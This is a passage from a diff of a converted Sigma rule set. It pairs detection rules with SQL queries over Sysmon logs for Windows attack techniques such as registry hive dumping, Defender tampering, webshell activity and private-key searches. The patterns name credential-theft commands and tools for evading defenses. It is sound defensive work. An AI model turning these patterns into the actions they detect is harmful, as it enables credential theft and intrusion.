"proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cdb.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "status": "test", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], + "falsepositives": [ + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + }, + { + "title": "Suspicious Obfuscated 
PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' 
ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", + "title": "UtilityFunctions.ps1 Proxy Dll", + "id": "0403d67d-6227-4ea8-8145-4e72db7da120", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE 
'%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_lolbin_utilityfunctions.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' 
ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", + "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "status": "experimental", + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "author": "@gott_cyber", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", - "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "status": "experimental", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", 
"status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + 
"filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "title": "Private Keys Reconnaissance Via CommandLine Tools", + "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND 
(((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_susp_private_keys_recon.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Remote Access Tool - NetSupport Execution From Unusual Location", + "id": "37e8d358-6408-4853-82f4-98333fca7014", + "status": "experimental", + "description": "Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\client32.exe' ESCAPE '\\' OR Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE 
'%IMPHASH=a9d50692e95b79723f3e76fcf70d023e%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport_susp_exec.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" - ], "falsepositives": [ - "Unlikely" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE 
'%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 